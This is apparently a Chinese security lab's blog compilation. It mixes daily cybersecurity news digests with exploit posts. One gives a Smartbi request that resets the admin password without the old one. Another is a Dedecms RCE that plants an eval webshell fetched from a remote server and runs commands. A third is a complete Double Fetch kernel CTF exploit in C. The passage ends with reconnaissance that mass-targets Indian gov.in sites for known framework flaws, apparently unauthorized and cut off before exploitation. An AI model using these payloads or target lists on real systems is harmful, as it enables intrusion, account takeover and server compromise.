网络安全日报 2023年08月16日
1、研究人员披露针对npm开发者的供应链攻击活动
https://blog.phylum.io/sophisticated-highly-targeted-attacks-continue-to-plague-npm/ npm 包注册表已成为另一个高度针对性的攻击活动的目标,该攻击活动旨在诱使开发人员下载恶意模块。2023 年 8 月 9 日至 12 日期间,多达 9 个软件包已被确定上传到 npm。其中包括:ws-paso-jssdk、pingan-vue-floating、srm-front-util、cloud-room-video、progress-player 、ynf-core-loader、ynf-core-renderer、
2、攻击者利用测试版应用程序欺骗移动应用程序商店安全审查
https://www.ic3.gov/Media/Y2023/PSA230814 美国联邦调查局 (FBI) 警告网络犯罪分子采用的一种新策略,他们在流行的移动应用商店上推广恶意“测试版”加密货币投资应用程序,然后用于窃取加密货币。攻击者将恶意应用程序作为“测试版”提交到移动应用程序商店,这意味着它们处于早期开发阶段,旨在供技术爱好者或粉丝在软件正式发布之前进行测试并向开发人员提交反馈。这种方法的好处是,测试版应用程序不会经过标准、严格的代码审查流程,而是对其安全性进行表面审查。
3、攻击者入侵基于WordPress漏洞的网站进行钓鱼攻击
https://securelist.com/phishing-with-hacked-sites/110334/ 网络钓鱼攻击者希望他们的虚假页面花费最少的精力,但产生尽可能多的收入,因此他们急切地使用各种工具和技术来逃避检测,并节省时间和金钱。例如网络钓鱼工具包或Telegram 机器人的自动化。另一种攻击者(包括网络钓鱼者)常用的策略是侵入网站并在这些网站上放置恶意内容,而非注册新域名。除了在他们入侵的网站中隐藏网络钓鱼页面外,攻击者还可以窃取服务器上的所有数据并完全破坏网站的运行。
4、印度计算机紧急响应小组对Android 13等多个版本发出高风险警告
https://www.indiatoday.in/technology/news/story/government-alerts-mobile-users-issues-high-risk-warning-for-android-13-and-other-versions-2420682-2023-08-14 印度计算机紧急响应小组 (CERT-In) 已向 Android 用户发出警告。此警告被归类为“高严重性”,涉及在多个版本的 Android 操作系统(包括最新的 Android 13)中发现的多个漏洞。这些漏洞被归类为“高严重性”,可能会被攻击者利用控制易受攻击的设备、窃取敏感信息
5、Monti 勒索软件团伙推出了新的 Linux 加密器
https://securityaffairs.com/149539/cyber-crime/monti-ransomware-news-linux-variant.html Monti 勒索软件运营商在暂停两个月后带着加密器的新 Linux 变体回归。
6、研究人员披露名为QwixxRAT的新型恶意软件
https://www.uptycs.com/blog/remote-access-trojan-qwixx-telegram 攻击者通过 Telegram 和 Discord 平台宣传销售一种名为 QwixxRAT 的新型远程访问木马。研究人员发现该恶意软件一旦安装在受害者的 Windows 平台计算机上,就会收集敏感数据,然后将其发送到攻击者的 Telegram 机器人,从而使他们能够未经授权访问受害者的敏感信息。该恶意软件收集网络浏览器历史记录、书签、cookie、信用卡信息、击键、屏幕截图、与某些扩展名匹配的文件以及来自 Steam 和 Telegram 等应用程序的数据。
7、专家警告网络犯罪分子滥用 Cloudflare R2 托管网络钓鱼页面
https://thehackernews.com/2023/08/cybercriminals-abusing-cloudflare-r2.html 过去六个月中,威胁行为者使用 Cloudflare R2 托管网络钓鱼页面的次数增加了 61 倍。Netskope 安全研究员 Jan Michael表示:“大多数网络钓鱼活动都针对 Microsoft 登录凭据,也有一些页面针对 Adobe、Dropbox 和其他云应用程序。”
8、预算超 43 亿元!金融之都纽约发布首个网络安全战略
https://www.secrss.com/articles/57764 美国纽约州州长 Kathy Hochul 推出一项广泛的网络安全战略,拨款 6 亿美元(约合人民币 43.53 亿元)用于保护该州数字和关键基础设施免受网络威胁。
9、福特曝 WiFi 安全漏洞,官方称仍可安全驾驶
https://www.bleepingcomputer.com/news/security/ford-says-cars-with-wifi-vulnerability-still-safe-to-drive/ 福特汽车供应商的安全人员向福特公司报告了一个安全漏洞,漏洞编号 CVE-2023-29468,该漏洞位于汽车信息娱乐系统集成的 WiFi 系统 WL18xx MCP 驱动程序中,允许 WiFi 范围内的攻击者使用特制的帧触发缓冲区溢出。
10、英国政府承包商 MPD FM 泄露员工护照数据
https://securityaffairs.com/149440/security/mpd-fm-data-leak.html 为英国多个政府部门提供服务的设施管理和安全公司 MPD FM 泄露了一个开放实例,暴露了员工护照、签证和其他敏感数据。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
Smartbi 修改用户密码漏洞
漏洞简介
通过查看 Smartbi 的补丁包信息,发现存在漏洞在某种特定情况下修改用户的密码,进行简单的复现和分析
漏洞复现
在页面上修改密码时,需要知道原本的用户对应的密码
直接构造这样的数据包,就不需要知道原本的密码,知道用户名就可以修改密码
POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 73
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
Connection: close
className=UserService&methodName=changePasswordEx¶ms=["admin","","1"]
漏洞分析
smartbi.usermanager.ILocalUserManagerModule#changePasswordEx
smartbi.usermanager.UserManagerModule#changePasswordEx
修改密码的操作虽然获取了用户名 原本的密码 修改后的新密码,但是对原本的密码并没有做任何校验处理
userId 是根据传入的用户名查询到的
smartbi.usermanager.UserManagerModule#updateUserEx
smartbi.usermanager.UserManagerModule#updateUserExtend
漏洞修复
上传补丁包后再发送数据包,发现被拦截
匹配到对应的类名和方法就结束执行
网络安全日报 2023年08月15日
1、MaginotDNS攻击利用DNS缓存中毒的弱检查
https://www.blackhat.com/us-23/briefings/schedule/#maginotdns-attacking-the-boundary-of-dns-caching-protection-31901 来自加州大学欧文分校和清华大学的研究人员团队开发了一种名为“MaginotDNS”的新型强大缓存中毒攻击,该攻击针对条件 DNS (CDNS) 解析器,可以危害整个 TLD 顶级域。DNS(域名系统)是一种针对互联网资源和网络的分层分布式命名系统,有助于将人类可读的域名解析为数字 IP 地址,以便建立网络连接。由于不同 DNS 软件和服务器模式(递归解析器和转发
2、苹果设备上的VPN易受到TunnelCrack组合漏洞攻击
https://papers.mathyvanhoef.com/usenix2023-tunnelcrack.pdf TunnelCrack 是 VPN 中两个广泛存在的安全漏洞的组合。攻击者可以利用这些漏洞将流量泄露到 VPN 隧道之外。研究人员测试表明,每个 VPN 产品至少在一台设备上容易受到攻击。研究人员发现,iPhone、iPad、MacBook 和 macOS 上的 VPN 极有可能容易受到攻击,Windows 和 Linux 上的大多数 VPN 都容易受到攻击,Android 是最安全的,大约有四分之一的 VPN 应用程序容易受到攻击。无论 VPN 使用何种安全协议,所发现的漏
3、研究人员披露macOS后台任务管理机制的漏洞
https://www.wired.com/story/apple-mac-background-task-management-flaw/ 研究人员发现 Apple macOS 后台任务管理机制存在漏洞,该机制可能被利用来绕过该公司最近添加的监控工具。Apple 的后台任务管理工具专注于监视软件“持久性”。恶意软件可以设计为短暂的,仅在设备上短暂运行或直到计算机重新启动为止。但它也可以被构建为更深入地建立自身并“坚持”目标,即使计算机关闭并重新启动也是如此。当某些东西持续自行安装时,可能导致任何复杂的恶意软件都可以轻松绕过监控。
4、SugarCRM零日漏洞可被利用以在云端访问密钥
https://unit42.paloaltonetworks.com/sugarcrm-cloud-incident-black-hat/ SugarCRM(CVE-2023-22952)零日身份验证绕过和远程代码执行漏洞是一个典型的漏洞,实际上,防御者需要注意更多内容。由于它是一个 Web 应用程序,如果未正确配置或保护,幕后的基础设施可能会让攻击者扩大其影响。当攻击者了解云服务提供商使用的底层技术时,如果他们能够访问具有正确权限的凭据,攻击者就可以入侵更多的基础设施。
5、CyberPower 和 Dataprobe的九个漏洞使数据中心易遭受黑客攻击
https://securityaffairs.com/149478/security/cyberpower-dcim-pdu-flaws.html CyberPower PowerPanel Enterprise DCIM 平台和 Dataprobe PDU 中的多个漏洞可能会使数据中心遭受黑客攻击。
6、Python URL处理模块urllib存在严重漏洞可导致任意命令执行
https://securityaffairs.com/149447/hacking/python-url-severe-vulnerability.html Python URL解析功能中存在严重漏洞,可被利用实现任意文件读取和命令执行。该问题影响 3.11 之前的所有 python 版本。
7、奥科桌面电话和 Zoom 的零接触配置 (ZTP) 存在多个漏洞
https://securityaffairs.com/149487/hacking/zooms-zero-touch-provisioning-flaws.html 奥科桌面电话和 Zoom 的零接触配置 (ZTP) 中存在多个缺陷,可能会遭受多种攻击。
8、Iagona ScrutisWeb 漏洞可能使 ATM 机遭受远程攻击
https://www.securityweek.com/iagona-scrutisweb-vulnerabilities-could-expose-atms-to-remote-hacking/ 法国公司 Iagona 制造的 ScrutisWeb ATM 机群监控软件中发现的多个漏洞可被用来远程攻击 ATM。 这些安全漏洞是由 Synack Red Team 成员发现的,供应商于 2023 年 7 月发布了 ScrutisWeb 版本 2.1.38,对其进行了修补。 ScrutisWeb 允许组织通过网络浏览器监控银行或零售 ATM 机群,使他们能够快速响应问题。
9、科罗拉多州警告因IBM Moveit 漏洞导致 400 万人数据泄露
https://securityaffairs.com/149498/data-breach/colorado-hcpf-department-data-breach.html 科罗拉多州医疗保健政策和融资部 (HCPF) 披露了 IBM MOVEit 攻击后发生的数据泄露事件。影响超过 400 万人。
10、在 WolfGPT 和 WormGPT 之后,Evil-GPT 出现在黑客论坛上
https://thecyberexpress.com/wolfgpt-wormgpt-evil-gpt-surface-hacker-forum/ 一位用户正在推广“Evil-GPT”的销售,这是一种为恶意使用而制作的生成AI聊天机器人,将其定位为WormGPT的最终替代品。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
Dedecms V110最新版RCE---Tricks
前言
刚发现Dedecms更新了发布版本,顺便测试一下之前的day有没有修复,突然想到了新的tricks去实现RCE。
文章发布的时候估计比较晚了,一直没时间写了。
利用
/uploads/dede/article_string_mix.php
/uploads/dede/article_template_rand.php
/uploads/dede/sys_task.php
......
我发布的文档->>>>添加文档->>>>站内选择进行文件上传
/uploads/dede/content_list.php](http://dedecms.xyz:8066/uploads/dede/content_list.php?mid=1)
/uploads/dede/catalog_do.php?channelid=0&cid=0&dopost=addArchives
文件上传
在vps上起一个http的服务,端口设置为8016
远程服务器存放shell.php,文件内容为
<?php @eval ($_POST ['a']);?>
准备一个图片格式的文件,文件内容为,这里我上传的文件名称为f.png
<? copy("http://192.168.225.40:8016/shell.php","shell.php");?>
上传成功后可以看到上传的图片的位置
修改文件名为b.php
保存发现png图片已成功被更改,访问b.php,从远程vps下载了shell.php,当前目录下存在一个名称为shell.php的木马文件
利用webshell进行命令执行。
成功执行了命令
思考
如果不考虑文件上传后缀名绕过方法,仅以上面图片格式的文件上传的话,那么无所谓上传的什么内容,因为本身来讲dede的代码中对文件内容是做的有校验的
所以文件内有两种绕过方法
正则绕过
disable函数绕过
简单搜索了一下各个平台的文章,其实是有师傅正则绕过实现webshell的。第二点儿,disable函数绕过,往前几个版本,有兴趣的可以看一下源码,之前利用全局变量Globals绕过
代码内容
<?php
$a = $GLOBALS["_GET"];
$b = $GLOBALS["_GET"];
$a['test1']($b['test2'])
?>
命令执行
http://dedecms.org:8016/uploads/shell.php?test1=assert&&test2=system(%22ipconfig%22);&&成功执行命令,且该命令执行为未授权命令执行。
所以在官方前几个版本中已经更新了,添加进了禁用方法
所以在绕过禁用方法上来讲更容易一点儿。所以在利用上这里利用了copy函数的特性,那么这里提醒一下,其它的函数当然也可以满足效果。
网络安全日报 2023年08月14日
1、研究人员披露Lapsus$勒索组织利用SIM交换进行网络攻击
https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf 美国政府分析了 Lapsus$ 勒索组织利用 SIM 交换等简单技术破坏数十个安全态势良好的组织并发布了一份报告。Lapsus$ 是一个组织松散的团体,主要由青少年组成,成员来自英国和巴西,他们在 2021 年至 2022 年间从事活动,目的是为了恶名、经济利益或娱乐。他们还将各种复杂的技术与“创造力的闪光”结合起来。去年 12 月, 在 Lapsus$ 泄露了所谓受害者的专有数据后,发生了一系列归因于或由 Lapsus$ 声称的事件后,对该组织的
2、研究人员披露SystemBC恶意后门新变体DroxiDat
https://securelist.com/focus-on-droxidat-systembc/110302/ 研究人员发现部署到关键基础设施目标的SystemBC 后门的新变体DroxiDat。在此次活动中,具有代理功能的后门与 Cobalt Strike 信标一起部署在南非国家的关键基础设施中。DroxiDat有效负载组件是一个不断变化的恶意后门。之前 SystemBC 有效负载中提供的大部分功能已从其代码库中剥离,而该 DroxiDat 恶意软件变体的目的是一个简单的系统分析器,其文件名表明其用例为“syscheck.exe”。它不提供下载和执行功能,但可以与远程侦听器连接并来回传
3、APT29组织伪造德国大使馆PDF文件发起钓鱼攻击
https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs 研究人员观察到针对北约联盟国家外交部的两份 PDF 文档。这些 PDF 文件伪装成来自德国大使馆,并包含两个外交邀请诱饵文件。其中一个 PDF 提供了 Duke 的变种,这是一种与俄罗斯国家资助的 APT29 网络间谍活动相关的恶意软件。另一个文件很可能用于测试或侦察,因为它不包含有效负载,但如果受害者打开电子邮件附件,则会通知攻击者。APT29使用
4、AdLoad恶意软件针对Mac系统进行网络攻击
https://cybersecurity.att.com/blogs/labs-research/mac-systems-turned-into-proxy-exit-nodes-by-adload AdLoad 恶意软件在 2017 年首次出现多年后,仍在感染 Mac 系统。AdLoad 是一个软件包捆绑器,据观察,它在其存在期间提供了广泛的有效负载。研究人员在对其最新有效负载进行调查期间发现,AdLoad 在过去一年中删除的最常见组件是代理应用程序,该代理应用程序将 MacOS AdLoad 受害者变成一个巨大的住宅代理僵尸网络。
5、CODESYS SDK多个漏洞可被利用使OT技术环境面临远程攻击
https://www.microsoft.com/en-us/security/blog/2023/08/10/multiple-high-severity-vulnerabilities-in-codesys-v3-sdk-could-lead-to-rce-or-dos/ CODESYS V3软件开发套件 (SDK)中披露了一组 16 个高严重性安全漏洞,这些漏洞可能导致特定条件下的远程代码执行和拒绝服务,从而给运营技术 (OT) 环境带来风险。这些漏洞从追踪为 CVE-2022-47378 到 CVE-2022-47393,被称为CoDe16,CVSS 评分为 8.8,但 CVE-2
6、Avada WordPress主题和插件中存在多个漏洞
https://www.infosecurity-magazine.com/news/flaws-wordpress-avada-theme-plugin/ Avada 主题及其随附的 Avada Builder 插件中已发现多个漏洞。安全研究员发现的这些安全漏洞使大量 WordPress 网站面临潜在的漏洞。在这些漏洞中,Avada Builder 插件存在两个。第一个是经过身份验证的 SQL 注入 (CVE-2023-39309)。利用此漏洞,拥有经过身份验证的访问权限的攻击者可能会破坏敏感数据并可能执行远程代码。第二个是反射跨站脚本 (XSS) 漏洞 (CVE-2023-39306),
7、LOLEKHosted管理员因协助Netwalker勒索软件组织被捕
https://www.bleepingcomputer.com/news/security/lolekhosted-admin-arrested-for-aiding-netwalker-ransomware-gang/ 警方已经控制了 Lolek 防弹托管提供商,逮捕了五个人并没收了涉嫌为 Netwalker 勒索软件攻击和其他恶意活动提供便利的服务器。防弹托管提供商是一家对其服务器上的犯罪活动或托管受版权保护材料的报告视而不见的托管公司。与传统公司相比,网络犯罪分子更喜欢这些类型的托管提供商,因为他们可以发起网络犯罪活动,而不必担心在报告恶意活动后他们会被关闭。
8、奥科桌面电话和Zoom ZTP存在多个漏洞可导致用户遭遇窃听
https://blog.syss.com/posts/zero-touch-pwn/ 奥科桌面电话和 Zoom 的零接触配置 ( ZTP )中已披露多个安全漏洞,恶意攻击者可能利用这些漏洞进行远程攻击。外部攻击者利用奥科桌面电话和 Zoom 零接触配置功能中发现的漏洞,可以获得对设备的完全远程控制。然后,不受限制的访问可以被武器化,以窃听房间或电话、通过设备进行攻击并攻击公司网络,甚至构建受感染设备的僵尸网络。
9、福特汽车称存在 WiFi 漏洞的汽车仍可安全驾驶
https://www.bleepingcomputer.com/news/security/ford-says-cars-with-wifi-vulnerability-still-safe-to-drive/ 福特警告称,许多福特和林肯汽车所使用的 SYNC3 信息娱乐系统存在缓冲区溢出漏洞,该漏洞可能允许远程执行代码,但表示车辆驾驶安全不会受到影响。SYNC3 是一款现代信息娱乐系统,支持车载 WiFi 热点、电话连接、语音命令、第三方应用程序等。该漏洞被追踪为 CVE-2023-29468,位于汽车信息娱乐系统中集成的 WiFi 子系统的 WL18xx MCP 驱动程序中,该漏洞允许
10、CyberPower和 Dataprobe产品的多个漏洞使数据中心面临风险
https://thehackernews.com/2023/08/multiple-flaws-in-cyberpower-and.html 影响 CyberPower 的 PowerPanel 企业数据中心基础设施管理 (DCIM) 平台和 Dataprobe 的 iBoot 配电单元 (PDU) 的多个安全漏洞可能会被利用来获得对这些系统的未经身份验证的访问,并在目标环境中造成灾难性损坏。这九个漏洞(从 CVE-2023-3259 到 CVE-2023-3267)的严重程度评分从 6.7 到 9.8 不等,使威胁行为者能够关闭整个数据中心并破坏数据中心部署,以窃取数据或大规模发动大规模
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年08月11日
1、BitForge零日漏洞可被利用以窃取加密货币
https://www.bleepingcomputer.com/news/cryptocurrency/new-bitforge-cryptocurrency-wallet-flaws-lets-hackers-steal-crypto/ 研究人员发现的加密货币钱包第一个漏洞 (CVE-2023-33241) 影响 GG18 和 GG20 门限签名方案 (TSS),这些方案被认为是 MPC 钱包行业的开创性和基础性的,允许多方生成密钥和共同签署交易。在 GG-18、GG-20 和 Lindell 17 等广泛使用的加密协议的实施中,多个名为“BitForge”的零日漏洞影响了流行的加密货币
2、开源项目Moq新版本涉及用户隐私问题
https://www.bleepingcomputer.com/news/security/popular-open-source-project-moq-criticized-for-quietly-collecting-data/ 开源项目 Moq(发音为“Mock”)因其在其最新版本中悄悄包含有争议的依赖项而招致了尖锐的批评。Moq 分布在 NuGet 软件注册表上,每天的下载量超过 100,000 次,在其生命周期内下载量超过 4.76 亿次。Moq 本周发布的 4.20.0 版本悄然包含了另一个项目 SponsorLink,该项目在开源软件消费者中引起了轩然大波,他们将此举比作违
3、CISA 发现名为 Whirlpool 的新后门,用于 Barracuda ESG 攻击
https://securityaffairs.com/149392/hacking/whirlpool-backdoor-barracuda-esg-attacks.html 美国网络安全和基础设施安全局 (CISA) 在针对 Barracuda ESG 设备的攻击中发现了一个名为 Whirlpool 的新后门。
4、北爱尔兰警察局(PSNI)警察的数据被泄露在网上
https://securityaffairs.com/149359/data-breach/psni-data-leak.html 北爱尔兰警察局 (PSNI) 应信息自由请求错误地共享了所有 10,000 名在职警察的敏感数据。
5、Android 2023 年 8 月安全更新修复了 40 个漏洞
https://www.securityweek.com/40-vulnerabilities-patched-in-android-with-august-2023-security-updates 随着 2023 年 8 月安全更新的发布,Google 修复了 Android 操作系统中的 40 多个漏洞。 据这家科技巨头称,最严重的漏洞是 CVE-2023-21273,这是一个影响系统组件的关键远程代码执行问题。利用该漏洞不需要用户交互或提升权限。CVE-2023-21273 影响 Android 11、12、12L 和 13。
6、搜狗输入法加密机制存在严重漏洞,可被CBC填充攻击和窃听明文
https://thehackernews.com/2023/08/encryption-flaws-in-popular-chinese.html 多伦多大学公民实验室的调查结果对腾讯搜狗输入法中使用的加密机制进行了分析,该应用程序在 Windows、Android 和 iOS 上每月拥有超过 4.55 亿活跃用户。这些漏洞源于该服务的自定义加密系统 EncryptWall,允许网络窃听者提取文本内容并访问敏感数据。“Windows和Android版本的搜狗输入法在该加密系统中存在漏洞,其中包括CBC padding oracle攻击的漏洞,该漏洞允许网络窃听者恢复加密网络传输的明文,从而
7、网传58集团“倒卖”毕业生简历信息
https://www.freebuf.com/news/374397.html 近日,国内多家媒体相继发文称,前 58 员工透露集团内部借助招聘名义,倒卖大量学生简历,此事一经爆出迅速引起社会讨论。随着此事热度不断上升,网友陆续扒出 58 集团在收集到大批学生简历后,高价卖给培训机构,以此收取返利。
8、为打击漏洞利用,谷歌将每周更新Chrome安全补丁
https://www.freebuf.com/news/374385.html 谷歌宣布,从Chrome浏览器116版本开始,其安全更新频率将从过去的每两周一次压缩为每周一次,以解决攻击者通过补丁更新的时间间隔,利用N Day和0 Day漏洞进行攻击活动。
9、每天罚款 100 万克朗,挪威将对 Meta 开巨额罚单
https://www.ithome.com/0/711/030.htm 挪威监管机构 Datatilsynet 曾于 7 月 17 日宣布,如果 Meta 公司无法满足该机构的监管要求,妥善解决隐私泄露问题,那么将执行罚款措施。
10、航旅业大地震:常旅客积分系统曝严重漏洞
https://www.secrss.com/articles/57535 黑客可利用常旅客系统漏洞窃取客户隐私数据和积分,甚至控制整个系统给任何人授予无限飞行里程或酒店住宿积分。Points.com是全球航空公司和酒店常旅客积分计划的主要数字基础设施提供商之一。近日,安全研究人员发现Points.com的API中存在可利用漏洞,攻击者可利用这些漏洞泄漏客户数据、窃取客户的“忠诚货币”(例如里程),甚至接管Points全球管理帐户获得对整个忠诚度计划的控制权。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
条件竞争漏洞Double Fetch
前言
Double Fetch(双取)是一种条件竞争的漏洞,相关的论文发表在USENIX,论文链接:https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-wang.pdf
Double Fetch
Double Fetch是内核的一种漏洞类型,发生在内核从用户空间中拷贝数据时,两次访问了相同一块内存。如下图示(图片来自论文),内核从用户空间拷贝数据时,第一次拷贝会进行安全检测,而第二次拷贝时才会进行数据的使用,那么在第一次拷贝与第二次拷贝的间隙,就能够进行恶意数据篡改。举个例子,在第一次时从用户空间中获取了需要拷贝的长度,并进行长度的检测,但是在第二次拷贝时会再次拷贝长度,并且根据该长度进行数据的拷贝。但是此时的长度是没有经过校验的,因此当该长度在第一次拷贝与第二次拷贝之间被修改,就会导致漏洞的发生。这种漏洞就被称之为Double Fetch。
论文的作者总结了容易发生Double Fetch的情况,如下图示(图片来自论文)。通常用户进程会通过指定的消息格式与内核进行通信,而消息格式通常由消息头与消息体构成。消息头包含了一些特殊属性,比如消息的长度,消息的类型等。那么内核通常会取出消息头,根据消息头的信息,进行不同的分支执行。若在进入分支后,内核依旧提取出消息头,并使用了前面使用过的字段,就非常容易发生Double Fetch,因为在这两次提取的过程中,用户态的程序可以修改消息头。
作者根据Double Fetch发生的场景,并将其进行分类
类型选择
长度检查
浅拷贝
类型选择
类型选择的Double Fetch,如下图示(图片来自论文)。代码截取自cxgb3 main.c。可以看到下述代码首先通过copy_from_user函数从useraddr中拷贝数据到cmd中,而useraddr为用户空间的地址。而后续的流程会根据从useraddr中提取出的数据从而选择执行。并且在每个分支中,又通过copy_from_user函数从useraddr的地址中取出数据,做后续的处理。若在后续的处理中又重复使用到了cmd那么就会导致Double Fetch。
长度选择
长度选择的Double Fetch,如下图示(图片来自论文)。在第一次拷贝是通过copy_from_user从arg中获取数据,并且提取了header.Size,在第二次时又重复了这个过程,这就是明显的Double Fetch。若在两次提取之间修改了header.Size值,并通过aac_fib_send函数发送数据,那么就会导致漏洞的发送,即可以泄露比原本header.Size值更大的数据量。
浅拷贝
浅拷贝则是第一次的拷贝只是将指向用户数据的指针拷贝到内核中,后续在将用户数据拷贝进来。如下图示(图片来自论文)。第一次获取时是通过指向用户数据的指针的指针,而第二次同样是这么获取的,那么在第一次与第二次的间隔中修改指针的指向就会导致数据被修改。
举个例子,即内核拷贝时并不是把能够读取用户数据的地址拷贝进来,而是将指向该地址的地址给拷贝进来,即下图中的ptr,因此后续内核在读取数据的时候都是通过ptr进行获取,那么在两次获取的中途修改了ptr的指向,那么就可以使得内核指向恶意数据。
总结一下Double Fetch的利用流程
内核会从用户空间中获取数据,并且会两次获取相同空间的数据
在两次获取的过程中没有检测获取的数据是否一致
最后在两次获取的过程中,篡改该空间的数据
20180ctf-final-baby
题目链接:https://github.com/h0pe-ay/Kernel-Pwn/tree/master/0ctf-final-baby
在模块中存在baby_ioctl函数,若rsi的值为0x6666则会将flag输出,由于是通过printk,因此需要通过dmesg输出,若rsi为0x1337,则会经过一个校验函数,若通过该校验流程,则会将flag的值与传入的地址的内容进行比较,若内容完全一致,那么则会将flag直接输出,同样的该输出是通过printk,因此需要通过dmesg进行打印。
接着看校验函数,该函数很简单,接受三个参数,a1、a2、a3,若a1 + a2 < a3则通过检查。而a1的值是我们所控制的,即rdx寄存器的值,而a3的值则是通过¤t_task中获取的。
可以发现从¤t_task中获取的地址为0x7ffffffff000
下图为用户空间的地址分布,可以看到0x7ffffffff000为末尾地址,因此该检测即使若传入的地址是用户空间地址则通过,传入内核空间地址就不通过。
这么做的原因是因为,flag字符串是硬编码到驱动中的,若能够读取内核空间的内容,岂不是可以直接读取了?因此该题做了隔离。
那么这题就能够使用Double Fetch进行利用,重点来看检测部分。驱动会进行三块检测
检查传入的地址是否为用户空间的地址
检查传入的地址的内容的值是否为用户空间的地址
检查传入的长度是否与flag的长度一致
总的来说从用户空间中我们传入了一个结构体
typedef struct
{
char *flag_addr;
unsigned long flag_len;
};
可以看到该题在检测的时候获取的用户空间的地址v5,接着在循环过程中再一次获得用户空间的地址v5,在这两次获取的过程中并没有去比较值是否被修改了,那么就导致了Double Fetch。
利用的思路如下
在检测阶段,v5的我们使用用户空间的变量值进行赋值,即v5 = buf
而进入比较阶段,v5的值我们使用flag的地址值进行赋值,即v5 = flag
那么如何获得进入比较阶段的时间点呢,可以看到题目即使比较失败也不会发生异常而是简单的返回,因此我们可以开启一个线程,不断的修改v5 = flag即可
...
void *
rewrite_flag_addr(void *arg)
{
pdata data = (pdata)arg;
while(finish == 0)
{
data->flag_addr = (char *)target_addr;
//printf("%p\n",data_flag.flag_addr);
}
}
...
err = pthread_create(&ntid, NULL, rewrite_flag_addr, &data_flag);
...
具体流程如下图,这里用线程的原因
主线程与子线程异步执行
线程之间共享内存信息
因此可以利用其他线程去修改共享的内存
完整exp
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <pthread.h>
#define MAXSIZE 1024
#define MAXTIME 1000000
unsigned long target_addr;
int finish;
typedef struct
{
char* flag_addr;
unsigned long flag_len;
}data, *pdata;
data data_flag;
int fd;
void *
rewrite_flag_addr(void *arg)
{
pdata data = (pdata)arg;
while(finish == 0)
{
data->flag_addr = (char *)target_addr;
//printf("%p\n",data_flag.flag_addr);
}
}
int main()
{
fd = open("/dev/baby", O_RDWR);
__asm(
".intel_syntax noprefix;"
"mov rax, 0x10;"
"mov rdi, fd;"
"mov rsi, 0x6666;"
"syscall;"
".att_syntax;"
);
char buf[MAXSIZE];
char *target;
int count;
int flag = open("/dev/kmsg", O_RDONLY);
if (flag == -1)
printf("open dmesg error");
while ((count = read(flag, buf, MAXSIZE)) > 0)
{
if ((target = strstr(buf, "Your flag is at ")) > 0)
{
target = target + strlen("Your flag is at ");
char *temp = strstr(target, "!");
target[temp - target] = 0;
target_addr = strtoul(target, NULL, 16);
printf("flag address:0x%s\n",target);
printf("flag address:0x%lx\n", target_addr);
break;
}
}
data_flag.flag_addr = buf;
data_flag.flag_len = 33;
pthread_t ntid;
int err;
err = pthread_create(&ntid, NULL, rewrite_flag_addr, &data_flag);
for (int i = 0; i < MAXTIME; i++)
{
ioctl(fd, 0x1337, &data_flag);
data_flag.flag_addr = buf;
//printf("%d\n",i);
}
finish = 1;
pthread_join(ntid, NULL);
printf("end!");
//system("dmesg | grep flag");
}
一次暴露面全开的红帽渗透测试【getshell】
0x01、信息收集阶段
注:本次信息收集过程主要使用FOFA网络探测平台 https://fofa.info/===
一开始进行收集的时候,有点迷,直接进行了大面积的"gov.in"域名收集
host="gov.in" && country="IN"
哈哈68465条数据,想想就起飞,但是有个问题来了,怎么下载到本地,高级用户的API也只能调用下载1w条数据,左思右想。
试着写了个脚本看看:
import pythonfofa
import csv
filename = "IN_domain.csv"
email = 'u_mail'
key = 'u_API_KEY'
search = pythonfofa.Client(email, key)
get_data = search.search('host="gov.in" && country="IN"', size=70000)
# print(get_data)
requests = [result[1] for result in get_data['results']]
print(requests)
# 打开CSV文件并设置写入模式
with open(filename, "w", newline="") as file:
writer = csv.writer(file)
# 遍历请求列表
for request in requests:
# 在控制台打印域名
print(request)
# 检测域名是否包含"http://"
if not request.startswith("http://") and not request.startswith("https://"):
# 如果不包含,则在域名前添加"http://"
request = "http://" + request
# 在域名后添加斜杠"/"
request += "/"
# 将请求和值"1"作为一行写入CSV文件
writer.writerow([request, 1])
是的,肯定不能跑,下断点,调试看看
很好确实是不能直接干7w条,换个收集思路,收集主流框架进行相应的漏扫
主流框架的相关漏洞的FOFA规则语句:
Fastjson
app="Fastjson" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")
Struts2
app="Struts" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")
Log4j2
(app="Log4j2" && host="in" && country="IN" && status_code="200" && (port="80" || port="443"))
其他的也都大同小异,照葫芦画瓢就行。
目标站点收集差不多了,就是漏洞探测阶段了。
0x02、漏洞探测及利用
